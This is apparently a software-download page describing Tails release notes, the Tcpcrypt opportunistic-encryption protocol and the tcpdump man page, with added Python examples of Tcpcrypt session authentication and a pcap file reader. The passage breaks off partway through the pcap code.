    • The Ibus Vietnamese input method is now supported.
    • Improved support for OpenPGP smartcards through the installation of GnuPG 2.

    There are numerous other changes that may not be apparent in the daily operation of a typical user. Technical details of all the changes are listed in the Changelog.


    Download Tails 1.3

    Tails 1.4 - The Amnesic Incognito Live System



    Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
    • use the Internet anonymously and circumvent censorship;
      all connections to the Internet are forced to go through the Tor network;
    • leave no trace on the computer you are using unless you ask it explicitly;
    • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.  

    Tails, The Amnesic Incognito Live System, version 1.4, is out.

    New features
    • Tor Browser 4.5 now has a security slider that you can use to disable browser features, such as JavaScript, as a trade-off between security and usability. The security slider is set to low by default to provide the same level of security as previous versions and the most usable experience.
      We disabled in Tails the new circuit view of Tor Browser 4.5 for security reasons. You can still use the network map of Vidalia to inspect your circuits.
    • Tails OpenPGP Applet now has a shortcut to the gedit text editor, thanks to Ivan Bliminse.
    • Paperkey lets you print a backup of your OpenPGP secret keys on paper.

    Upgrades and changes
    • Tor Browser 4.5 protects better against third-party tracking. Often when visiting a website, many connections are created to transfer both the content of the main website (its page, images, and so on) and third-party content from other websites (advertisements, Like buttons, and so on). In Tor Browser 4.5, all such content, from the main website as well as the third-party websites, goes through the same Tor circuits. And these circuits are not reused when visiting a different website. This prevents third-party websites from correlating your visits to different websites.
    • Tor Browser 4.5 now keeps using the same Tor circuit while you are visiting a website. This prevents the website from suddenly changing language, behavior, or logging you out.
    • Disconnect is the new default search engine. Disconnect provides Google search results to Tor users without captchas or bans.
    • Better support for Vietnamese in LibreOffice through the installation of fonts-linuxlibertine.
    • Disable security warnings when connecting to POP3 and IMAP ports that are mostly used for StartTLS nowadays.
    • Support for more printers through the installation of printer-driver-gutenprint.
    • Upgrade Tor to 0.2.6.7.
    • Upgrade I2P to 0.9.19 that has several fixes and improvements for floodfill performance.
    • Remove the obsolete #i2p-help IRC channel from Pidgin.
    • Remove the command line email client mutt and msmtp.
    There are numerous other changes that might not be apparent in the daily operation of a typical user. Technical details of all the changes are listed in the Changelog.

    Fixed problems
    • Make the browser theme of the Windows 8 camouflage compatible with the Unsafe Browser and the I2P Browser.
    • Remove the Tor Network Settings... from the Torbutton menu.
    • Better support for Chromebook C720-2800 through the upgrade of syslinux.
    • Fix the localization of Tails Upgrader.
    • Fix the OpenPGP key servers configured in Seahorse.
    • Prevent Tor Browser from crashing when Orca is enabled.

    Tails 1.7 - The Amnesic Incognito Live System


    Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
    • use the Internet anonymously and circumvent censorship;
      all connections to the Internet are forced to go through the Tor network;
    • leave no trace on the computer you are using unless you ask it explicitly;
    • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.  

    Tails, The Amnesic Incognito Live System, version 1.7, is out.
    This release fixes numerous security issues. All users must upgrade as soon as possible.

    New features

    • You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents.
    • We added Icedove, a rebranded version of the Mozilla Thunderbird email client.
      Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove.

    Upgrades and changes

    • Improve the wording of the first screen of Tails Installer.
    • Restart Tor automatically if connecting to the Tor network takes too long. (#9516)
    • Update several firmware packages which might improve hardware compatibility.
    • Update the Tails signing key which is now valid until 2017.
    • Update Tor Browser to 5.0.4.
    • Update Tor to 0.2.7.4.

    Fixed problems

    • Prevent wget from leaking the IP address when using the FTP protocol. (#10364)
    • Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333)
    • Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades.
    • Make the "I2P is ready" notification more reliable.

    Tcpcrypt - Encrypting the Internet


    Tcpcrypt is a protocol that attempts to encrypt (almost) all of your network traffic. Unlike other security mechanisms, Tcpcrypt works out of the box: it requires no configuration, no changes to applications, and your network connections will continue to work even if the remote end does not support Tcpcrypt, in which case connections will gracefully fall back to standard clear-text TCP. Install Tcpcrypt and you'll feel no difference in your every day user experience, but yet your traffic will be more secure and you'll have made life much harder for hackers.

    So why is now the right time to turn on encryption? Here are some reasons:
    • Intercepting communications today is simpler than ever because of wireless networks. Ask a hacker how many e-mail passwords can be intercepted at an airport by just using a wifi-enabled laptop. This unsophisticated attack is in reach of many. The times when only a few elite had the necessary skill to eavesdrop are gone.
    • Computers have now become fast enough to encrypt all Internet traffic. New computers come with special hardware crypto instructions that allow encrypted networking speeds of 10Gbit/s. How many of us even achieve those speeds on the Internet or would want to download (and watch) one movie per second? Clearly, we can encrypt fast enough.
    • Research advances and the lessons learnt from over 10 years of experience with the web finally enabled us to design a protocol that can be used in today's Internet, by today's users. Our protocol is pragmatic: it requires no changes to applications, it works with NATs (i.e., compatible with your DSL router), and will work even if the other end has not yet upgraded to tcpcrypt—in which case it will gracefully fall back to using the old plain-text TCP. No user configuration is required, making it accessible to lay users—no more obscure requests like "Please generate a 2048-bit RSA-3 key and a certificate request for signing by a CA". Tcpcrypt can be incrementally deployed today, and with time the whole Internet will become encrypted.

    How Tcpcrypt works

    Tcpcrypt is opportunistic encryption. If the other end speaks Tcpcrypt, then your traffic will be encrypted; otherwise it will be in clear text. Thus, Tcpcrypt alone provides no guarantees—it is best effort. If, however, a Tcpcrypt connection is successful and any attackers that exist are passive, then Tcpcrypt guarantees privacy.

    Network attackers come in two varieties: passive and active (man-in-the-middle). Passive attacks are much simpler to execute because they just require listening on the network. Active attacks are much harder as they require listening and modifying network traffic, often requiring very precise timing that can make some attacks impractical.

    By default Tcpcrypt is vulnerable to active attacks—an attacker can, for example, modify a server's response to say that Tcpcrypt is not supported (when in fact it is) so that all subsequent traffic will be clear text and can thus be eavesdropped on.

    Tcpcrypt, however, is powerful enough to stop active attacks, too, if the application using it performs authentication. For example, if you log in to online banking using a password and the connection is over Tcpcrypt, it is possible to use that shared secret between you and the bank (i.e., the password) to authenticate that you are actually speaking to the bank and not some active (man-in-the-middle) attacker. The attacker cannot spoof authentication as it lacks the password. Thus, by default, Tcpcrypt will try its best to protect your traffic. Applications requiring stricter guarantees can get them by authenticating a Tcpcrypt session.
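    The mechanism behind the paragraph above is that every Tcpcrypt connection yields a session ID that both ends know and that differs for every connection. An application that already shares a secret (a password) can MAC that session ID with the secret: an attacker who terminates the connection and opens a second one to the server holds two different session IDs, so the tag the client computed never verifies on the server's side. The block below is an added example written for this page, not Tcpcrypt code; it models the session ID as a random value both ends of one connection receive (a simplification of the real key exchange) and uses HMAC-SHA256 for the binding.

```python
import hashlib
import hmac
import os


class Endpoint:
    """One side of a (heavily simplified) Tcpcrypt session; only the session ID matters here."""

    def __init__(self, name):
        self.name = name
        self.session_id = None


def tcpcrypt_handshake(a, b):
    """Stand-in for the key exchange: both ends of one TCP connection end up with
    the same fresh session ID. A man in the middle terminates two connections
    and therefore holds two different session IDs, one per side."""
    sid = os.urandom(32)
    a.session_id = sid
    b.session_id = sid
    return sid


def auth_tag(password, session_id):
    """Bind the application's shared secret to this particular session."""
    return hmac.new(password.encode(), b"tcpcrypt session auth" + session_id, hashlib.sha256).digest()


def server_accepts(server, expected_password, presented_tag):
    return hmac.compare_digest(presented_tag, auth_tag(expected_password, server.session_id))


def direct_login(client_password, server_password):
    """No attacker: one connection, one session ID on both ends."""
    client, server = Endpoint("client"), Endpoint("bank")
    tcpcrypt_handshake(client, server)
    return server_accepts(server, server_password, auth_tag(client_password, client.session_id))


def mitm_login(password):
    """Active attacker in the path: it can read and relay everything but cannot
    make the two session IDs equal, so the relayed tag fails at the server."""
    client, server = Endpoint("client"), Endpoint("bank")
    mitm_left, mitm_right = Endpoint("mitm-facing-client"), Endpoint("mitm-facing-server")
    tcpcrypt_handshake(client, mitm_left)
    tcpcrypt_handshake(mitm_right, server)
    tag_from_client = auth_tag(password, client.session_id)   # attacker sees this but lacks the password
    return server_accepts(server, password, tag_from_client)  # relayed verbatim


if __name__ == "__main__":
    print("direct:", direct_login("hunter2", "hunter2"))
    print("mitm:  ", mitm_login("hunter2"))
```

    Two caveats the model makes visible: the attacker still sees an HMAC under the password and can try to brute-force it offline, so this only protects as well as the password is strong; and the attacker who downgrades the connection to plain TCP before any session ID exists is not stopped by this check at all, only detected by an application that refuses to proceed without one.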

    How Tcpcrypt is different

    Some of us already encrypt some network traffic using SSL (e.g., HTTPS) or VPNs. Those solutions are inadequate for ubiquitous encryption. For example, almost all solutions rely on a PKI to stop man-in-the-middle attacks, which for ubiquitous deployment would mean that all Internet users would have to get verified by a CA like Verisign and have to spend money to buy a certificate. Tcpcrypt abstracts away authentication, allowing any mechanism to be used, whether PKI, passwords, or something else.
    Next, Tcpcrypt can be incrementally deployed: it has a mechanism for probing support and can gracefully fall back to TCP. It also requires no configuration (try that with a VPN!) and has no NAT issues. Finally, Tcpcrypt has very high performance (up to 25x faster than SSL), making it feasible for high volume servers to enable encryption on all connections. While weaker by default, Tcpcrypt is more realistic for universal deployment.

    We can easily make the bar much higher for attackers, so let's do it. How much longer are we going to stay clear-text by default?


    Download Tcpcrypt

    Tcpdump - Dump Traffic on a Network


    Tcpdump allows you to dump the traffic on a network. It can be used to print out the headers and/or contents of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect many attacks, or to monitor the network activities.
    Tcpdump prints out a description of the contents of packets on a network interface that match the boolean expression; the description is preceded by a time stamp, printed, by default, as hours, minutes, seconds, and fractions of a second since midnight. It can also be run with the -w flag, which causes it to save the packet data to a file for later analysis, and/or with the -r flag, which causes it to read from a saved packet file rather than to read packets from a network interface. It can also be run with the -V flag, which causes it to read a list of saved packet files. In all cases, only packets that match expression will be processed by tcpdump.
    Tcpdump will, if not run with the -c flag, continue capturing packets until it is interrupted by a SIGINT signal (generated, for example, by typing your interrupt character, typically control-C) or a SIGTERM signal (typically generated with the kill(1) command); if run with the -c flag, it will capture packets until it is interrupted by a SIGINT or SIGTERM signal or the specified number of packets have been processed.
    When tcpdump finishes capturing packets, it will report counts of:
    packets ``captured'' (this is the number of packets that tcpdump has received and processed);
    packets ``received by filter'' (the meaning of this depends on the OS on which you're running tcpdump, and possibly on the way the OS was configured - if a filter was specified on the command line, on some OSes it counts packets regardless of whether they were matched by the filter expression and, even if they were matched by the filter expression, regardless of whether tcpdump has read and processed them yet, on other OSes it counts only packets that were matched by the filter expression regardless of whether tcpdump has read and processed them yet, and on other OSes it counts only packets that were matched by the filter expression and were processed by tcpdump);
    packets ``dropped by kernel'' (this is the number of packets that were dropped, due to a lack of buffer space, by the packet capture mechanism in the OS on which tcpdump is running, if the OS reports that information to applications; if not, it will be reported as 0).
    On platforms that support the SIGINFO signal, such as most BSDs (including Mac OS X) and Digital/Tru64 UNIX, it will report those counts when it receives a SIGINFO signal (generated, for example, by typing your ``status'' character, typically control-T, although on some platforms, such as Mac OS X, the ``status'' character is not set by default, so you must set it with stty(1) in order to use it) and will continue capturing packets. On platforms that do not support the SIGINFO signal, the same can be achieved by using the SIGUSR1 signal.
    Reading packets from a network interface may require that you have special privileges; see the pcap (3PCAP) man page for details. Reading a saved packet file doesn't require special privileges.  

    OPTIONS

    -A
    Print each packet (minus its link level header) in ASCII. Handy for capturing web pages.
    -b
    Print the AS number in BGP packets in ASDOT notation rather than ASPLAIN notation.
    -B buffer_size
    --buffer-size=buffer_size
    Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes).
    -c count
    Exit after receiving count packets.
    -C file_size
    Before writing a raw packet to a savefile, check whether the file is currently larger than file_size and, if so, close the current savefile and open a new one. Savefiles after the first savefile will have the name specified with the -w flag, with a number after it, starting at 1 and continuing upward. The units of file_size are millions of bytes (1,000,000 bytes, not 1,048,576 bytes).
    -d
    Dump the compiled packet-matching code in a human readable form to standard output and stop.
    -dd
    Dump packet-matching code as a C program fragment.
    -ddd
    Dump packet-matching code as decimal numbers (preceded with a count).
    -D
    --list-interfaces
    Print the list of the network interfaces available on the system and on which tcpdump can capture packets. For each network interface, a number and an interface name, possibly followed by a text description of the interface, is printed. The interface name or the number can be supplied to the -i flag to specify an interface on which to capture.
    This can be useful on systems that don't have a command to list them (e.g., Windows systems, or UNIX systems lacking ifconfig -a); the number can be useful on Windows 2000 and later systems, where the interface name is a somewhat complex string.
    The -D flag will not be supported if tcpdump was built with an older version of libpcap that lacks the pcap_findalldevs() function.
    -e
    Print the link-level header on each dump line. This can be used, for example, to print MAC layer addresses for protocols such as Ethernet and IEEE 802.11.
    -E
    Use spi@ipaddr algo:secret for decrypting IPsec ESP packets that are addressed to addr and contain Security Parameter Index value spi. This combination may be repeated with comma or newline separation.
    Note that setting the secret for IPv4 ESP packets is supported at this time.
    Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3-cbc, cast128-cbc, or none. The default is des-cbc. The ability to decrypt packets is only present if tcpdump was compiled with cryptography enabled.
    secret is the ASCII text for ESP secret key. If preceded by 0x, then a hex value will be read.
    The option assumes RFC2406 ESP, not RFC1827 ESP. The option is only for debugging purposes, and the use of this option with a true `secret' key is discouraged. By putting the IPsec secret key on the command line you make it visible to others, via ps(1) and by other means.
    In addition to the above syntax, the syntax file name may be used to have tcpdump read the provided file in. The file is opened upon receiving the first ESP packet, so any special permissions that tcpdump may have been given should already have been given up.
    -f
    Print `foreign' IPv4 addresses numerically rather than symbolically (this option is intended to get around serious brain damage in Sun's NIS server --- usually it hangs forever translating non-local internet numbers).
    The test for `foreign' IPv4 addresses is done using the IPv4 address and netmask of the interface on which capture is being done. If that address or netmask is not available, either because the interface on which capture is being done has no address or netmask or because the capture is being done on the Linux "any" interface, which can capture on more than one interface, this option will not work correctly.
    -F file
    Use file as input for the filter expression. An additional expression given on the command line is ignored.
    -G rotate_seconds
    If specified, rotates the dump file specified with the -w option every rotate_seconds seconds. Savefiles will have the name specified by -w which should include a time format as defined by strftime(3). If no time format is specified, each new file will overwrite the previous.
    If used in conjunction with the -C option, filenames will take the form of `file<count>'.
    -h
    --help
    Print the tcpdump and libpcap version strings, print a usage message, and exit.
    --version
    Print the tcpdump and libpcap version strings and exit.
    -H
    Attempt to detect 802.11s draft mesh headers.
    -i interface
    --interface=interface
    Listen on interface. If unspecified, tcpdump searches the system interface list for the lowest numbered, configured up interface (excluding loopback), which may turn out to be, for example, ``eth0''.
    On Linux systems with 2.2 or later kernels, an interface argument of ``any'' can be used to capture packets from all interfaces. Note that captures on the ``any'' device will not be done in promiscuous mode.
    If the -D flag is supported, an interface number as printed by that flag can be used as the interface argument.
    -I
    --monitor-mode
    Put the interface in "monitor mode"; this is supported only on IEEE 802.11 Wi-Fi interfaces, and supported only on some operating systems.
    Note that in monitor mode the adapter might disassociate from the network with which it's associated, so that you will not be able to use any wireless networks with that adapter. This could prevent accessing files on a network server, or resolving host names or network addresses, if you are capturing in monitor mode and are not connected to another network with another adapter.
    This flag will affect the output of the -L flag. If -I isn't specified, only those link-layer types available when not in monitor mode will be shown; if -I is specified, only those link-layer types available when in monitor mode will be shown.
    --immediate-mode
    Capture in "immediate mode". In this mode, packets are delivered to tcpdump as soon as they arrive, rather than being buffered for efficiency. This is the default when printing packets rather than saving packets to a ``savefile'' if the packets are being printed to a terminal rather than to a file or pipe.
    -j tstamp_type
    --time-stamp-type=tstamp_type
    Set the time stamp type for the capture to tstamp_type. The names to use for the time stamp types are given in pcap-tstamp(7); not all the types listed there will necessarily be valid for any given interface.
    -J
    --list-time-stamp-types
    List the supported time stamp types for the interface and exit. If the time stamp type cannot be set for the interface, no time stamp types are listed.
    --time-stamp-precision=tstamp_precision
    When capturing, set the time stamp precision for the capture to tstamp_precision. Note that availability of high precision time stamps (nanoseconds) and their actual accuracy is platform and hardware dependent. Also note that when writing captures made with nanosecond accuracy to a savefile, the time stamps are written with nanosecond resolution, and the file is written with a different magic number, to indicate that the time stamps are in seconds and nanoseconds; not all programs that read pcap savefiles will be able to read those captures.
    When reading a savefile, convert time stamps to the precision specified by timestamp_precision, and display them with that resolution. If the precision specified is less than the precision of time stamps in the file, the conversion will lose precision.
    The supported values for timestamp_precision are micro for microsecond resolution and nano for nanosecond resolution. The default is microsecond resolution.
    -K
    --dont-verify-checksums
    Don't attempt to verify IP, TCP, or UDP checksums. This is useful for interfaces that perform some or all of those checksum calculations in hardware; otherwise, all outgoing TCP checksums will be flagged as bad.
    -l
    Make stdout line buffered. Useful if you want to see the data while capturing it. E.g.,
    tcpdump -l | tee dat
    or
    tcpdump -l > dat & tail -f dat
    Note that on Windows, ``line buffered'' means ``unbuffered'', so that WinDump will write each character individually if -l is specified.
    -U is similar to -l in its behavior, but it will cause output to be ``packet-buffered'', so that the output is written to stdout at the end of each packet rather than at the end of each line; this is buffered on all platforms, including Windows.
    -L
    --list-data-link-types
    List the known data link types for the interface, in the specified mode, and exit. The list of known data link types may be dependent on the specified mode; for example, on some platforms, a Wi-Fi interface might support one set of data link types when not in monitor mode (for example, it might support only fake Ethernet headers, or might support 802.11 headers but not support 802.11 headers with radio information) and another set of data link types when in monitor mode (for example, it might support 802.11 headers, or 802.11 headers with radio information, only in monitor mode).
    -m module
    Load SMI MIB module definitions from file module. This option can be used several times to load several MIB modules into tcpdump.
    -M secret
    Use secret as a shared secret for validating the digests found in TCP segments with the TCP-MD5 option (RFC 2385), if present.
    -n
    Don't convert addresses (i.e., host addresses, port numbers, etc.) to names.
    -N
    Don't print domain name qualification of host names. E.g., if you give this flag then tcpdump will print ``nic'' instead of ``nic.ddn.mil''.
    -#
    --number
    Print an optional packet number at the beginning of the line.
    -O
    --no-optimize
    Do not run the packet-matching code optimizer. This is useful only if you suspect a bug in the optimizer.
    -p
    --no-promiscuous-mode
    Don't put the interface into promiscuous mode. Note that the interface might be in promiscuous mode for some other reason; hence, `-p' cannot be used as an abbreviation for `ether host {local-hw-addr} or ether broadcast'.
    -Q direction
    --direction=direction
    Choose send/receive direction direction for which packets should be captured. Possible values are `in', `out' and `inout'. Not available on all platforms.
    -q
    Quick (quiet?) output. Print less protocol information so output lines are shorter.
    -R
    Assume ESP/AH packets to be based on old specification (RFC1825 to RFC1829). If specified, tcpdump will not print replay prevention field. Since there is no protocol version field in ESP/AH specification, tcpdump cannot deduce the version of ESP/AH protocol.
    -r file
    Read packets from file (which was created with the -w option or by other tools that write pcap or pcap-ng files). Standard input is used if file is ``-''.
    -S
    --absolute-tcp-sequence-numbers
    Print absolute, rather than relative, TCP sequence numbers.
    -s snaplen
    --snapshot-length=snaplen
    Snarf snaplen bytes of data from each packet rather than the default of 65535 bytes. Packets truncated because of a limited snapshot are indicated in the output with ``[|proto]'', where proto is the name of the protocol level at which the truncation has occurred. Note that taking larger snapshots both increases the amount of time it takes to process packets and, effectively, decreases the amount of packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number that will capture the protocol information you're interested in. Setting snaplen to 0 sets it to the default of 65535, for backwards compatibility with recent older versions of tcpdump.
    -T type
    Force packets selected by "expression" to be interpreted as the specified type. Currently known types are aodv (Ad-hoc On-demand Distance Vector protocol), carp (Common Address Redundancy Protocol), cnfp (Cisco NetFlow protocol), lmp (Link Management Protocol), pgm (Pragmatic General Multicast), pgm_zmtp1 (ZMTP/1.0 inside PGM/EPGM), radius (RADIUS), rpc (Remote Procedure Call), rtp (Real-Time Applications protocol), rtcp (Real-Time Applications control protocol), snmp (Simple Network Management Protocol), tftp (Trivial File Transfer Protocol), vat (Visual Audio Tool), wb (distributed White Board), zmtp1 (ZeroMQ Message Transport Protocol 1.0) and vxlan (Virtual eXtensible Local Area Network).
    Note that the pgm type above affects UDP interpretation only, the native PGM is always recognised as IP protocol 113 regardless. UDP-encapsulated PGM is often called "EPGM" or "PGM/UDP".
    Note that the pgm_zmtp1 type above affects interpretation of both native PGM and UDP at once. During the native PGM decoding the application data of an ODATA/RDATA packet would be decoded as a ZeroMQ datagram with ZMTP/1.0 frames. During the UDP decoding in addition to that any UDP packet would be treated as an encapsulated PGM packet.
    -t
    Don't print a timestamp on each dump line.
    -tt
    Print the timestamp, as seconds since January 1, 1970, 00:00:00, UTC, and fractions of a second since that time, on each dump line.
    -ttt
    Print a delta (micro-second resolution) between current and previous line on each dump line.
    -tttt
    Print a timestamp, as hours, minutes, seconds, and fractions of a second since midnight, preceded by the date, on each dump line.
    -ttttt
    Print a delta (micro-second resolution) between current and first line on each dump line.
    -u
    Print undecoded NFS handles.
    -U
    --packet-buffered
    If the -w option is not specified, make the printed packet output ``packet-buffered''; i.e., as the description of the contents of each packet is printed, it will be written to the standard output, rather than, when not writing to a terminal, being written only when the output buffer fills.
    If the -w option is specified, make the saved raw packet output ``packet-buffered''; i.e., as each packet is saved, it will be written to the output file, rather than being written only when the output buffer fills.
    The -U flag will not be supported if tcpdump was built with an older version of libpcap that lacks the pcap_dump_flush() function.
    -v
    When parsing and printing, produce (slightly more) verbose output. For example, the time to live, identification, total length and options in an IP packet are printed. Also enables additional packet integrity checks such as verifying the IP and ICMP header checksum.
    When writing to a file with the -w option, report, every 10 seconds, the number of packets captured.
    -vv
    Even more verbose output. For example, additional fields are printed from NFS reply packets, and SMB packets are fully decoded.
    -vvv
    Even more verbose output. For example, telnet SB ... SE options are printed in full. With -X Telnet options are printed in hex as well.
    -V file
    Read a list of filenames from file. Standard input is used if file is ``-''.
    -w file
    Write the raw packets to file rather than parsing and printing them out. They can later be printed with the -r option. Standard output is used if file is ``-''.
    This output will be buffered if written to a file or pipe, so a program reading from the file or pipe may not see packets for an arbitrary amount of time after they are received. Use the -U flag to cause packets to be written as soon as they are received.
    The MIME type application/vnd.tcpdump.pcap has been registered with IANA for pcap files. The filename extension .pcap appears to be the most commonly used along with .cap and .dmp. Tcpdump itself doesn't check the extension when reading capture files and doesn't add an extension when writing them (it uses magic numbers in the file header instead). However, many operating systems and applications will use the extension if it is present and adding one (e.g. .pcap) is recommended.
    See pcap-savefile(5) for a description of the file format.
    -W
    Used in conjunction with the -C option, this will limit the number of files created to the specified number, and begin overwriting files from the beginning, thus creating a 'rotating' buffer. In addition, it will name the files with enough leading 0s to support the maximum number of files, allowing them to sort correctly.
    Used in conjunction with the -G option, this will limit the number of rotated dump files that get created, exiting with status 0 when reaching the limit. If used with -C as well, the behavior will result in cyclical files per timeslice.
    -x
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be printed. Note that this is the entire link-layer packet, so for link layers that pad (e.g. Ethernet), the padding bytes will also be printed when the higher layer packet is shorter than the required padding.
    -xx
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet, including its link level header, in hex.
    -X
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and ASCII. This is very handy for analysing new protocols.
    -XX
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet, including its link level header, in hex and ASCII.
    -y datalinktype
    --linktype=datalinktype
    Set the data link type to use while capturing packets to datalinktype.
    -z postrotate-command
    Used in conjunction with the -C or -G options, this will make tcpdump run "postrotate-command file", where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.
    Note that tcpdump will run the command in parallel to the capture, using the lowest priority so that this doesn't disturb the capture process.
    If you would like to use a command that itself takes flags or other arguments, write a shell script that takes the savefile name as its only argument, arranges the flags and arguments, and executes the command you want.
    -Z user
    --relinquish-privileges=user
    If tcpdump is running as root, after opening the capture device or input savefile, but before opening any savefiles for output, change the user ID to user and the group ID to the primary group of user.
    This behavior can also be enabled by default at compile time.
    expression
    selects which packets will be dumped. If no expression is given, all packets on the net will be dumped. Otherwise, only packets for which expression is `true' will be dumped. For the expression syntax, see pcap-filter(7).
    The expression argument can be passed to tcpdump as either a single Shell argument, or as multiple Shell arguments, whichever is more convenient. Generally, if the expression contains Shell metacharacters, such as backslashes used to escape protocol names, it is easier to pass it as a single, quoted argument rather than to escape the Shell metacharacters. Multiple arguments are concatenated with spaces before being parsed.
     

    EXAMPLES

    To print all packets arriving at or departing from sundown:
    tcpdump host sundown
    To print traffic between helios and either hot or ace:
    tcpdump host helios and \( hot or ace \)
    To print all IP packets between ace and any host except helios:
    tcpdump ip host ace and not helios
    To print all traffic between local hosts and hosts at Berkeley:
    tcpdump net ucb-ether
    To print all ftp traffic through internet gateway snup: (note that the expression is quoted to prevent the shell from (mis-)interpreting the parentheses):
    tcpdump 'gateway snup and (port ftp or ftp-data)'
    To print traffic neither sourced from nor destined for local hosts (if you gateway to one other net, this stuff should never make it onto your local net).
    tcpdump ip and not net localnet
    To print the start and end packets (the SYN and FIN packets) of each TCP conversation that involves a non-local host.
    tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0 and not src and dst net localnet'
    To print all IPv4 HTTP packets to and from port 80, i.e. print only packets that contain data, not, for example, SYN and FIN packets and ACK-only packets. (IPv6 is left as an exercise for the reader.)
    tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
    To print IP packets longer than 576 bytes sent through gateway snup:
    tcpdump 'gateway snup and ip[2:2] > 576'
    To print IP broadcast or multicast packets that were not sent via Ethernet broadcast or multicast:
    tcpdump 'ether[0] & 1 = 0 and ip[16] >= 224'
    To print all ICMP packets that are not echo requests/replies (i.e., not ping packets):
    tcpdump 'icmp[icmptype] != icmp-echo and icmp[icmptype] != icmp-echoreply'
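    A worked reader for the savefile format that -w produces and -r consumes, added here as an example (it is not code from tcpdump or libpcap): it detects the magic number, including the nanosecond variant written under --time-stamp-precision=nano, walks the records, and applies the same byte-offset arithmetic as the 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' filter above to a capture built in memory. The Ethernet/IPv4/TCP frames, addresses and timestamps are constructed for the example; no real traffic is embedded.

```python
"""Minimal pcap savefile reader that mirrors tcpdump's byte-offset filters.
Added example; not part of tcpdump or libpcap."""
import struct

# Magic numbers from pcap-savefile(5): microsecond and nanosecond variants.
MAGIC_MICRO = 0xA1B2C3D4
MAGIC_NANO = 0xA1B23C4D
LINKTYPE_ETHERNET = 1  # DLT_EN10MB
HTTP_PORT = 80


def ip_checksum(header):
    """RFC 1071 one's-complement checksum over an IPv4 header."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_packet(sport, dport, flags, payload=b""):
    """Constructed Ethernet/IPv4/TCP frame (sample input, not captured traffic).
    The TCP checksum is left at zero; only the IP header checksum is computed."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, flags, 65535, 0, 0) + payload
    total_len = 20 + len(tcp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    return eth + ip + tcp


def build_pcap(frames, snaplen=262144, nano=False):
    """Write a little-endian pcap savefile in memory, as tcpdump -w would."""
    magic = MAGIC_NANO if nano else MAGIC_MICRO
    out = struct.pack("<IHHiIII", magic, 2, 4, 0, 0, snaplen, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        frac = (i * 1000) if nano else i  # constructed timestamps
        out += struct.pack("<IIII", 1700000000 + i, frac, len(frame), len(frame)) + frame
    return out


def parse_global_header(data):
    """Detect byte order and timestamp precision from the magic number."""
    magic, = struct.unpack("<I", data[:4])
    table = {MAGIC_MICRO: ("<", False), MAGIC_NANO: ("<", True),
             0xD4C3B2A1: (">", False), 0x4D3CB2A1: (">", True)}
    if magic not in table:
        raise ValueError("not a pcap savefile: magic 0x%08x" % magic)
    endian, nano = table[magic]
    vmaj, vmin, _tz, _sig, snaplen, linktype = struct.unpack(endian + "HHiIII", data[4:24])
    return {"endian": endian, "nanosecond": nano, "version": (vmaj, vmin),
            "snaplen": snaplen, "linktype": linktype}


def iter_records(data):
    """Yield (timestamp_seconds, frame_bytes) for each record in the file."""
    hdr = parse_global_header(data)
    fmt = hdr["endian"] + "IIII"
    divisor = 1e9 if hdr["nanosecond"] else 1e6
    off = 24
    while off + 16 <= len(data):
        sec, frac, incl, _orig = struct.unpack(fmt, data[off:off + 16])
        off += 16
        yield sec + frac / divisor, data[off:off + incl]
        off += incl


def http_payload_len(frame):
    """Same arithmetic as the filter above: total length minus IP header
    length minus TCP data offset. Returns None when the frame is not
    IPv4/TCP to or from port 80."""
    if len(frame) < 14 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    if ip[9] != 6:  # not TCP
        return None
    ihl = (ip[0] & 0x0F) << 2
    total = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    if HTTP_PORT not in (sport, dport):
        return None
    data_off = (tcp[12] & 0xF0) >> 2
    return total - ihl - data_off


def http_data_packets(pcap_bytes):
    """(record index, payload length) for records the HTTP-data filter keeps."""
    hits = []
    for idx, (_ts, frame) in enumerate(iter_records(pcap_bytes)):
        plen = http_payload_len(frame)
        if plen:
            hits.append((idx, plen))
    return hits


# Constructed sample capture: a SYN with no data, a GET with data, and port-53 traffic.
SAMPLE_FRAMES = [
    build_tcp_packet(40000, 80, 0x02),                        # SYN only
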